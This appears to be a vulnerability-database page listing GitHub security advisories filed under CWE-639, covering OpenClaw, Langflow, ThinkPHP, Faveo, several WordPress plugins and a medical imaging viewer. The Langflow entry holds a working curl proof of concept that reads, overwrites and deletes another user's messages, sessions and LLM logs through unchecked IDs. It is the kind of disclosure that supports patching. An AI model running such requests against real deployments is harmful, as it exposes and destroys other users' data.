Common Weakness Enumeration

CWE-639

Allowed

Authorization Bypass Through User-Controlled Key

Abstraction: Base · Status: Incomplete

The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.

3255 vulnerabilities reference this CWE, most recent first.

GHSA-985F-72MJ-8GF7

Vulnerability from github – Published: 2026-06-18 13:04 – Updated: 2026-06-18 13:04
VLAI
Summary
OpenClaw: Tool group policy callers could accept unvalidated group IDs
Details

Summary

Tool group policy callers could accept unvalidated group IDs. In affected versions, a caller that can supply a group id to the affected policy resolver could resolve policy for an unvalidated group id.

This advisory is scoped to the named feature and configuration. It does not change OpenClaw's trusted-operator model: authenticated Gateway operators, installed plugins, and intentional local execution surfaces remain trusted unless a separate policy, approval, allowlist, sandbox, or auth boundary is crossed.

Impact

When the affected feature is enabled and reachable, this could apply the wrong group-policy decision for a tool invocation. Practical impact depends on the operator's configuration and whether lower-trust input can reach that path.

Patched Versions

The first stable patched version is 2026.4.25.

Mitigations

avoid exposing group-policy controlled tools to untrusted senders until patched. As general hardening, keep channel and tool allowlists narrow, avoid sharing one Gateway between mutually untrusted users, and disable the affected feature when it is not needed.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2026.4.24"
      },
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.4.25"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-53863"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T13:04:37Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nTool group policy callers could accept unvalidated group IDs. In affected versions, a caller that can supply a group id to the affected policy resolver could resolve policy for an unvalidated group id.\n\nThis advisory is scoped to the named feature and configuration. It does not change OpenClaw\u0027s trusted-operator model: authenticated Gateway operators, installed plugins, and intentional local execution surfaces remain trusted unless a separate policy, approval, allowlist, sandbox, or auth boundary is crossed.\n\n### Impact\n\nWhen the affected feature is enabled and reachable, this could apply the wrong group-policy decision for a tool invocation. Practical impact depends on the operator\u0027s configuration and whether lower-trust input can reach that path.\n\n### Patched Versions\n\nThe first stable patched version is `2026.4.25`.\n\n### Mitigations\n\navoid exposing group-policy controlled tools to untrusted senders until patched. As general hardening, keep channel and tool allowlists narrow, avoid sharing one Gateway between mutually untrusted users, and disable the affected feature when it is not needed.",
  "id": "GHSA-985f-72mj-8gf7",
  "modified": "2026-06-18T13:04:37Z",
  "published": "2026-06-18T13:04:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-985f-72mj-8gf7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53863"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-unvalidated-group-id-acceptance-in-tool-group-policy"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw: Tool group policy callers could accept unvalidated group IDs"
}

GHSA-98QR-JPXV-VFP8

Vulnerability from github – Published: 2026-07-14 12:31 – Updated: 2026-07-14 12:31
VLAI
Details

A vulnerability relating to insufficient access control has been identified in the session management of the Sesame Time web application and its REST v3 API. The flaw lies in the fact that the system uses the session identifier (USID) as the sole validation mechanism, without verifying whether that identifier legitimately belongs to the user making the request. As a result, an attacker who obtains a valid USID can impersonate a victim’s session and access their confidential information, including emails, user IDs, roles and corporate data. This vulnerability is exacerbated by poor session lifecycle management: new logins generate additional USIDs without revoking the previous ones, allowing multiple active sessions to coexist and thereby expanding the attack surface.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-15389"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-14T11:16:48Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability relating to insufficient access control has been identified in the session management of the Sesame Time web application and its REST v3 API. The flaw lies in the fact that the system uses the session identifier (USID) as the sole validation mechanism, without verifying whether that identifier legitimately belongs to the user making the request. As a result, an attacker who obtains a valid USID can impersonate a victim\u2019s session and access their confidential information, including emails, user IDs, roles and corporate data. This vulnerability is exacerbated by poor session lifecycle management: new logins generate additional USIDs without revoking the previous ones, allowing multiple active sessions to coexist and thereby expanding the attack surface.",
  "id": "GHSA-98qr-jpxv-vfp8",
  "modified": "2026-07-14T12:31:15Z",
  "published": "2026-07-14T12:31:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15389"
    },
    {
      "type": "WEB",
      "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/inadequate-access-control-sesame-time-session-management"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-98W3-FRC2-62P8

Vulnerability from github – Published: 2026-04-22 18:31 – Updated: 2026-04-22 18:31
VLAI
Details

ThinkPHP 5.0.23 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary PHP code by invoking functions through the routing parameter. Attackers can craft requests to the index.php endpoint with malicious function parameters to execute system commands with application privileges.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-25270"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-22T16:16:47Z",
    "severity": "CRITICAL"
  },
  "details": "ThinkPHP 5.0.23 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary PHP code by invoking functions through the routing parameter. Attackers can craft requests to the index.php endpoint with malicious function parameters to execute system commands with application privileges.",
  "id": "GHSA-98w3-frc2-62p8",
  "modified": "2026-04-22T18:31:44Z",
  "published": "2026-04-22T18:31:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25270"
    },
    {
      "type": "WEB",
      "url": "https://github.com/top-think/framework"
    },
    {
      "type": "WEB",
      "url": "https://thinkphp.cn"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/45978"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/thinkphp-remote-code-execution-via-invokefunction"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-99FR-5JWF-5MF5

Vulnerability from github – Published: 2023-03-24 15:30 – Updated: 2025-02-21 18:31
VLAI
Details

Faveo 5.0.1 allows remote attackers to obtain sensitive information via a modified user ID in an Insecure Direct Object Reference (IDOR) attack.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-24625"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-03-24T15:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Faveo 5.0.1 allows remote attackers to obtain sensitive information via a modified user ID in an Insecure Direct Object Reference (IDOR) attack.",
  "id": "GHSA-99fr-5jwf-5mf5",
  "modified": "2025-02-21T18:31:02Z",
  "published": "2023-03-24T15:30:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-24625"
    },
    {
      "type": "WEB",
      "url": "https://cupc4k3.lol/cve-2023-24625-idor-in-faveo-service-desk-37a63f53d896"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/%40cupc4k3/vulnerabilities-in-faveo-service-desk-37a63f53d896"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/@cupc4k3/vulnerabilities-in-faveo-service-desk-37a63f53d896"
    },
    {
      "type": "WEB",
      "url": "https://www.faveohelpdesk.com/servicedesk"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9C59-2MVC-VFR8

Vulnerability from github – Published: 2026-06-16 17:34 – Updated: 2026-06-16 17:34
VLAI
Summary
Langflow: IDOR/BOLA in Monitor API — Missing Ownership Enforcement on 7 Endpoints
Details

Summary

Langflow's /api/v1/monitor router exposes 7 endpoints that perform read, write, and delete operations on user-owned resources — messages, sessions, build artifacts, and LLM transaction logs — without verifying that the authenticated requester owns the targeted resource. Any authenticated user can read, modify, rename, or permanently delete another user's data by supplying the target's resource ID or flow_id. This is a classic IDOR/BOLA vulnerability. Notably, the same source file (monitor.py) contains one correctly-implemented endpoint that uses an ownership check, demonstrating the correct pattern was known but inconsistently applied.

Details

Source file: src/backend/base/langflow/api/v1/monitor.py

The correct pattern (used only in GET /monitor/messages, lines 77–80):

stmt = select(MessageTable)
stmt = stmt.join(Flow, MessageTable.flow_id == Flow.id)
stmt = stmt.where(Flow.user_id == current_user.id)  # ownership enforced

All 7 vulnerable endpoints are missing this guard:

1. GET /api/v1/monitor/builds (lines 27–33) — reads build data for any flow_id:

@router.get("/builds", dependencies=[Depends(get_current_active_user)])
async def get_vertex_builds(flow_id: Annotated[UUID, Query()], session: DbSession):
    vertex_builds = await get_vertex_builds_by_flow_id(session, flow_id)  # no ownership check
    return VertexBuildMapModel.from_list_of_dicts(vertex_builds)

2. DELETE /api/v1/monitor/messages (lines 102–107) — deletes any message by UUID:

@router.delete("/messages", status_code=204, dependencies=[Depends(get_current_active_user)])
async def delete_messages(message_ids: list[UUID], session: DbSession):
    await session.exec(delete(MessageTable).where(MessageTable.id.in_(message_ids)))
    # message_ids accepted verbatim, no ownership check

3. PUT /api/v1/monitor/messages/{message_id} (lines 110–134) — overwrites any message:

db_message = await session.get(MessageTable, message_id)
# no check: db_message.flow_id → Flow.user_id == current_user.id
db_message.sqlmodel_update(message_dict)

4. PATCH /api/v1/monitor/messages/session/{old_session_id} (lines 137–171) — renames any session:

stmt = select(MessageTable).where(MessageTable.session_id == old_session_id)
# no JOIN to Flow, no WHERE Flow.user_id == current_user.id

5. DELETE /api/v1/monitor/messages/session/{session_id} (lines 174–188) — bulk-deletes any session:

await session.exec(
    delete(MessageTable).where(col(MessageTable.session_id) == session_id)
    # no ownership filter
)

6. GET /api/v1/monitor/transactions (lines 191–211) — reads LLM prompt/response logs for any flow_id:

stmt = select(TransactionTable).where(TransactionTable.flow_id == flow_id)
# no JOIN to Flow, no WHERE Flow.user_id == current_user.id

7. DELETE /api/v1/monitor/builds — deletes build records for any flow_id: Shares the same root cause as endpoint #1 (GET /builds): flow_id is accepted as a bare query parameter and passed to the deletion path without a WHERE Flow.user_id == current_user.id ownership check, so any authenticated user can destroy another user's build artifacts.

PoC

Tested on Langflow v1.7.3 (langflowai/langflow:1.7.3) with two accounts: langflow (victim) and attacker_test (attacker).

# Setup: authenticate both users
TOKEN=$(curl -s -X POST http://localhost:7860/api/v1/login \
  -d "username=langflow&password=langflow" \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['access_token'])")

ATTKR=$(curl -s -X POST http://localhost:7860/api/v1/login \
  -d "username=attacker_test&password=Attacker123" \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['access_token'])")

# Victim creates a flow (attacker only needs to know the flow_id — obtainable via brute force or enumeration)
FLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \
  -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
  -d '{"name":"victim-flow","data":{"nodes":[],"edges":[]}}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['id'])")

# PoC 1: Read victim's LLM transaction logs (prompts + model responses)
curl -s "http://localhost:7860/api/v1/monitor/transactions?flow_id=$FLOW_ID" \
  -H "Authorization: Bearer $ATTKR"
# HTTP 200 — full transaction log returned including user prompts and model responses

# PoC 2: Read victim's build data
curl -s "http://localhost:7860/api/v1/monitor/builds?flow_id=$FLOW_ID" \
  -H "Authorization: Bearer $ATTKR"
# HTTP 200

# PoC 3: Delete victim's message (MESSAGE_ID obtained from transaction log above)
curl -s -X DELETE "http://localhost:7860/api/v1/monitor/messages" \
  -H "Authorization: Bearer $ATTKR" -H "Content-Type: application/json" \
  -d '["<victim_message_id>"]'
# HTTP 204 — message deleted

# PoC 4: Tamper with victim's message content
curl -s -X PUT "http://localhost:7860/api/v1/monitor/messages/<victim_message_id>" \
  -H "Authorization: Bearer $ATTKR" -H "Content-Type: application/json" \
  -d '{"text":"TAMPERED BY ATTACKER"}'
# HTTP 200 — message overwritten, "edit":true set

# PoC 5: Rename victim's session
curl -s -X PATCH \
  "http://localhost:7860/api/v1/monitor/messages/session/victim-session-1?new_session_id=attacker-controlled" \
  -H "Authorization: Bearer $ATTKR"
# HTTP 200 — session renamed

# PoC 6: Bulk-delete victim's entire session
curl -s -X DELETE \
  "http://localhost:7860/api/v1/monitor/messages/session/victim-session-2" \
  -H "Authorization: Bearer $ATTKR"
# HTTP 204 — entire session deleted

All 6 demonstrated attack vectors confirmed (the 7th, DELETE /builds, shares the GET /builds root cause and was not separately scripted). After attacker operations: victim's message text read "TAMPERED BY ATTACKER", session renamed to attacker-controlled name, second session completely deleted.

Impact

This vulnerability affects any Langflow deployment with multiple users (team instances, SaaS deployments, enterprise self-hosted).

Confidentiality: GET /transactions exposes the full LLM conversation history — user-submitted prompts and model responses — for any flow by flow_id. In healthcare, legal, financial, or HR deployments this directly exposes sensitive and potentially regulated data (HIPAA, GDPR). GET /builds exposes internal workflow execution state.

Integrity: PUT /messages/{id} allows rewriting any stored message, corrupting chat history, audit trails, and RAG-indexed memory. PATCH /messages/session/{id} allows renaming sessions, breaking session continuity and potentially injecting victim context into attacker-controlled namespaces.

Availability: DELETE /messages and DELETE /messages/session/{id} enable permanent, irreversible destruction of another user's conversation history and LLM logs. No recovery mechanism exists once data is deleted.

Any registered user account (including self-registered accounts if registration is open) has unrestricted cross-user access to all 6 operations against any other user's data.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "langflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33760"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T17:34:21Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nLangflow\u0027s `/api/v1/monitor` router exposes 7 endpoints that perform read, write, and delete operations on user-owned resources \u2014 messages, sessions, build artifacts, and LLM transaction logs \u2014 without verifying that the authenticated requester owns the targeted resource. Any authenticated user can read, modify, rename, or permanently delete another user\u0027s data by supplying the target\u0027s resource ID or `flow_id`. This is a classic IDOR/BOLA vulnerability. Notably, the same source file (`monitor.py`) contains one correctly-implemented endpoint that uses an ownership check, demonstrating the correct pattern was known but inconsistently applied.\n\n\n### Details\n\n**Source file: `src/backend/base/langflow/api/v1/monitor.py`**\n\nThe correct pattern (used only in `GET /monitor/messages`, lines 77\u201380):\n```python\nstmt = select(MessageTable)\nstmt = stmt.join(Flow, MessageTable.flow_id == Flow.id)\nstmt = stmt.where(Flow.user_id == current_user.id)  # ownership enforced\n```\n\nAll 7 vulnerable endpoints are missing this guard:\n\n**1. `GET /api/v1/monitor/builds` (lines 27\u201333)** \u2014 reads build data for any `flow_id`:\n```python\n@router.get(\"/builds\", dependencies=[Depends(get_current_active_user)])\nasync def get_vertex_builds(flow_id: Annotated[UUID, Query()], session: DbSession):\n    vertex_builds = await get_vertex_builds_by_flow_id(session, flow_id)  # no ownership check\n    return VertexBuildMapModel.from_list_of_dicts(vertex_builds)\n```\n\n**2. `DELETE /api/v1/monitor/messages` (lines 102\u2013107)** \u2014 deletes any message by UUID:\n```python\n@router.delete(\"/messages\", status_code=204, dependencies=[Depends(get_current_active_user)])\nasync def delete_messages(message_ids: list[UUID], session: DbSession):\n    await session.exec(delete(MessageTable).where(MessageTable.id.in_(message_ids)))\n    # message_ids accepted verbatim, no ownership check\n```\n\n**3. `PUT /api/v1/monitor/messages/{message_id}` (lines 110\u2013134)** \u2014 overwrites any message:\n```python\ndb_message = await session.get(MessageTable, message_id)\n# no check: db_message.flow_id \u2192 Flow.user_id == current_user.id\ndb_message.sqlmodel_update(message_dict)\n```\n\n**4. `PATCH /api/v1/monitor/messages/session/{old_session_id}` (lines 137\u2013171)** \u2014 renames any session:\n```python\nstmt = select(MessageTable).where(MessageTable.session_id == old_session_id)\n# no JOIN to Flow, no WHERE Flow.user_id == current_user.id\n```\n\n**5. `DELETE /api/v1/monitor/messages/session/{session_id}` (lines 174\u2013188)** \u2014 bulk-deletes any session:\n```python\nawait session.exec(\n    delete(MessageTable).where(col(MessageTable.session_id) == session_id)\n    # no ownership filter\n)\n```\n\n**6. `GET /api/v1/monitor/transactions` (lines 191\u2013211)** \u2014 reads LLM prompt/response logs for any `flow_id`:\n```python\nstmt = select(TransactionTable).where(TransactionTable.flow_id == flow_id)\n# no JOIN to Flow, no WHERE Flow.user_id == current_user.id\n```\n\n**7. `DELETE /api/v1/monitor/builds`** \u2014 deletes build records for any `flow_id`:\nShares the same root cause as endpoint #1 (`GET /builds`): `flow_id` is accepted as a bare query parameter and passed to the deletion path without a `WHERE Flow.user_id == current_user.id` ownership check, so any authenticated user can destroy another user\u0027s build artifacts.\n\n### PoC\n\nTested on Langflow v1.7.3 (`langflowai/langflow:1.7.3`) with two accounts: `langflow` (victim) and `attacker_test` (attacker).\n\n```bash\n# Setup: authenticate both users\nTOKEN=$(curl -s -X POST http://localhost:7860/api/v1/login \\\n  -d \"username=langflow\u0026password=langflow\" \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027access_token\u0027])\")\n\nATTKR=$(curl -s -X POST http://localhost:7860/api/v1/login \\\n  -d \"username=attacker_test\u0026password=Attacker123\" \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027access_token\u0027])\")\n\n# Victim creates a flow (attacker only needs to know the flow_id \u2014 obtainable via brute force or enumeration)\nFLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \\\n  -H \"Authorization: Bearer $TOKEN\" -H \"Content-Type: application/json\" \\\n  -d \u0027{\"name\":\"victim-flow\",\"data\":{\"nodes\":[],\"edges\":[]}}\u0027 \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027id\u0027])\")\n\n# PoC 1: Read victim\u0027s LLM transaction logs (prompts + model responses)\ncurl -s \"http://localhost:7860/api/v1/monitor/transactions?flow_id=$FLOW_ID\" \\\n  -H \"Authorization: Bearer $ATTKR\"\n# HTTP 200 \u2014 full transaction log returned including user prompts and model responses\n\n# PoC 2: Read victim\u0027s build data\ncurl -s \"http://localhost:7860/api/v1/monitor/builds?flow_id=$FLOW_ID\" \\\n  -H \"Authorization: Bearer $ATTKR\"\n# HTTP 200\n\n# PoC 3: Delete victim\u0027s message (MESSAGE_ID obtained from transaction log above)\ncurl -s -X DELETE \"http://localhost:7860/api/v1/monitor/messages\" \\\n  -H \"Authorization: Bearer $ATTKR\" -H \"Content-Type: application/json\" \\\n  -d \u0027[\"\u003cvictim_message_id\u003e\"]\u0027\n# HTTP 204 \u2014 message deleted\n\n# PoC 4: Tamper with victim\u0027s message content\ncurl -s -X PUT \"http://localhost:7860/api/v1/monitor/messages/\u003cvictim_message_id\u003e\" \\\n  -H \"Authorization: Bearer $ATTKR\" -H \"Content-Type: application/json\" \\\n  -d \u0027{\"text\":\"TAMPERED BY ATTACKER\"}\u0027\n# HTTP 200 \u2014 message overwritten, \"edit\":true set\n\n# PoC 5: Rename victim\u0027s session\ncurl -s -X PATCH \\\n  \"http://localhost:7860/api/v1/monitor/messages/session/victim-session-1?new_session_id=attacker-controlled\" \\\n  -H \"Authorization: Bearer $ATTKR\"\n# HTTP 200 \u2014 session renamed\n\n# PoC 6: Bulk-delete victim\u0027s entire session\ncurl -s -X DELETE \\\n  \"http://localhost:7860/api/v1/monitor/messages/session/victim-session-2\" \\\n  -H \"Authorization: Bearer $ATTKR\"\n# HTTP 204 \u2014 entire session deleted\n```\n\nAll 6 demonstrated attack vectors confirmed (the 7th, `DELETE /builds`, shares the `GET /builds` root cause and was not separately scripted). After attacker operations: victim\u0027s message text read `\"TAMPERED BY ATTACKER\"`, session renamed to attacker-controlled name, second session completely deleted.\n\n### Impact\n\nThis vulnerability affects any Langflow deployment with multiple users (team instances, SaaS deployments, enterprise self-hosted).\n\n**Confidentiality:** `GET /transactions` exposes the full LLM conversation history \u2014 user-submitted prompts and model responses \u2014 for any flow by `flow_id`. In healthcare, legal, financial, or HR deployments this directly exposes sensitive and potentially regulated data (HIPAA, GDPR). `GET /builds` exposes internal workflow execution state.\n\n**Integrity:** `PUT /messages/{id}` allows rewriting any stored message, corrupting chat history, audit trails, and RAG-indexed memory. `PATCH /messages/session/{id}` allows renaming sessions, breaking session continuity and potentially injecting victim context into attacker-controlled namespaces.\n\n**Availability:** `DELETE /messages` and `DELETE /messages/session/{id}` enable permanent, irreversible destruction of another user\u0027s conversation history and LLM logs. No recovery mechanism exists once data is deleted.\n\nAny registered user account (including self-registered accounts if registration is open) has unrestricted cross-user access to all 6 operations against any other user\u0027s data.",
  "id": "GHSA-9c59-2mvc-vfr8",
  "modified": "2026-06-16T17:34:21Z",
  "published": "2026-06-16T17:34:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-9c59-2mvc-vfr8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/langflow-ai/langflow"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Langflow: IDOR/BOLA in Monitor API \u2014 Missing Ownership Enforcement on 7 Endpoints "
}

GHSA-9CGG-XR6F-VRG8

Vulnerability from github – Published: 2022-11-04 12:00 – Updated: 2022-11-04 19:01
VLAI
Details

Multiple Insecure Direct Object References (IDOR) vulnerabilities in ExpressTech Quiz And Survey Master plugin <= 7.3.6 on WordPress.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-36906"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-11-03T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "Multiple Insecure Direct Object References (IDOR) vulnerabilities in ExpressTech Quiz And Survey Master plugin \u003c= 7.3.6 on WordPress.",
  "id": "GHSA-9cgg-xr6f-vrg8",
  "modified": "2022-11-04T19:01:16Z",
  "published": "2022-11-04T12:00:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36906"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/quiz-master-next/wordpress-quiz-and-survey-master-plugin-7-3-6-multiple-insecure-direct-object-references-idor-vulnerabilities?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://wordpress.org/plugins/quiz-master-next/#developers"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9CW8-P5P2-35PF

Vulnerability from github – Published: 2024-01-11 09:30 – Updated: 2026-04-08 21:32
VLAI
Details

The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to the mailer and view logs, including password reset emails, allowing site takeover.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-6875"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639",
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-01-11T09:15:52Z",
    "severity": "CRITICAL"
  },
  "details": "The POST SMTP Mailer \u2013 Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to the mailer and view logs, including password reset emails, allowing site takeover.",
  "id": "GHSA-9cw8-p5p2-35pf",
  "modified": "2026-04-08T21:32:11Z",
  "published": "2024-01-11T09:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6875"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/post-smtp/trunk/Postman/Mobile/includes/rest-api/v1/rest-api.php#L60"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3016051/post-smtp/trunk?contextall=1\u0026old=3012318\u0026old_path=%2Fpost-smtp%2Ftrunk"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e675d64c-cbb8-4f24-9b6f-2597a97b49af?source=cve"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/176525/WordPress-POST-SMTP-Mailer-2.8.7-Authorization-Bypass-Cross-Site-Scripting.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9F9F-HRXG-722W

Vulnerability from github – Published: 2023-09-13 03:30 – Updated: 2024-04-04 07:38
VLAI
Details

The Simplr Registration Form Plus+ plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 2.4.5. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for authenticated attackers with subscriber-level permissions or above to change user passwords and potentially take over administrator accounts.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-4213"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-13T03:15:08Z",
    "severity": "HIGH"
  },
  "details": "The Simplr Registration Form Plus+ plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 2.4.5. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for authenticated attackers with subscriber-level permissions or above to change user passwords and potentially take over administrator accounts.",
  "id": "GHSA-9f9f-hrxg-722w",
  "modified": "2024-04-04T07:38:41Z",
  "published": "2023-09-13T03:30:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4213"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/simplr-registration-form/trunk/lib/profile.php#L148"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6ddf0452-3afe-4ada-bccc-30c818968a81?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9FHW-HF7X-9GJC

Vulnerability from github – Published: 2022-12-09 00:30 – Updated: 2025-04-23 18:30
VLAI
Details

Canon Medical Informatics Vitrea Vision 7.7.76.1 does not adequately enforce access controls. An authenticated user is able to gain unauthorized access to imaging records by tampering with the vitrea-view/studies/search patientId parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-38765"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-12-09T00:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Canon Medical Informatics Vitrea Vision 7.7.76.1 does not adequately enforce access controls. An authenticated user is able to gain unauthorized access to imaging records by tampering with the vitrea-view/studies/search patientId parameter.",
  "id": "GHSA-9fhw-hf7x-9gjc",
  "modified": "2025-04-23T18:30:40Z",
  "published": "2022-12-09T00:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38765"
    },
    {
      "type": "WEB",
